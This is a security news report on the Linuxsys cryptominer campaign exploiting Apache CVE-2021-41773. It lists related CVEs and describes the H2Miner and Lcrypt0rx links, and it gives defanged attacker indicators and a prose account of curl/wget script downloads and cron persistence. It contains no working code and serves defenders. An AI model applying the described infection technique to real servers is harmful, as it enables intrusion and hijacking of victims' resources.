Linuxsys Cryptocurrency Miner Exploits Apache Vulnerability in Stealth Campaign

Cybersecurity researchers have uncovered an ongoing campaign that leverages a known vulnerability in the Apache HTTP Server to deliver a cryptocurrency mining malware known as Linuxsys. This campaign highlights a broader trend in resource hijacking and the growing sophistication of malware distribution techniques.

Vulnerability Exploited

The attack exploits CVE-2021-41773 (CVSS score: 7.5), a path traversal flaw in Apache HTTP Server 2.4.49 that can enable remote code execution. Despite being a known and patched issue, it remains widely exploited due to unpatched servers in production environments.

Infection Chain

According to VulnCheck, the attack begins with connections from an Indonesian IP address (103.193.177[.]152) that downloads a shell script from repositorylinux[.]org using curl or wget.

Key features of the campaign include:

• Malware hosted on compromised legitimate websites, reducing detection likelihood.

• Download of the Linuxsys miner from multiple trusted domains.

• Use of a cron job ("cron.sh") to maintain persistence across system reboots.

• Deployment of Windows payloads, suggesting cross-platform targeting.

Broader Exploitation Activity

Linuxsys has also been delivered via other vulnerabilities, including:

• CVE-2024-36401 – GeoServer GeoTools (CVSS 9.8)

• CVE-2023-22527 – Atlassian Confluence

• CVE-2023-34960 – Chamilo LMS

• CVE-2023-38646 – Metabase

• CVE-2024-0012 & CVE-2024-9474 – Palo Alto Networks

The malware campaign appears to avoid low-interaction honeypots, indicating careful victim targeting.

Overlap with H2Miner and Lcrypt0rx

The Linuxsys campaign overlaps with a broader set of attacks associated with H2Miner, a known cryptojacking botnet that also delivers:

• Kinsing RAT

• XMRig miner

• A VBScript-based ransomware known as Lcrypt0rx

Lcrypt0rx is notable for:

• Disabling Windows tools and security software.

• Attempting to overwrite the Master Boot Record (MBR).

• Demanding $1,000 in cryptocurrency, though its encryption is weak and easily reversible.

Key Takeaways

• Long-term campaigns are increasingly using patched vulnerabilities to target unmaintained systems.

• Cryptojacking remains financially attractive, especially in cloud environments where hijacked resources lead to increased operational costs.

• The use of AI-generated scripts and off-the-shelf tools lowers the barrier for entry, allowing less-skilled attackers to launch complex attacks.

Recommendation

Organizations should:

• Patch known vulnerabilities like CVE-2021-41773 promptly.

• Monitor outbound connections for unusual download activity.

• Employ defense-in-depth strategies, including EDR, firewall rules, and behavior-based detection.

As cloud and Linux environments continue to grow, so does the surface area for these resource exploitation campaigns.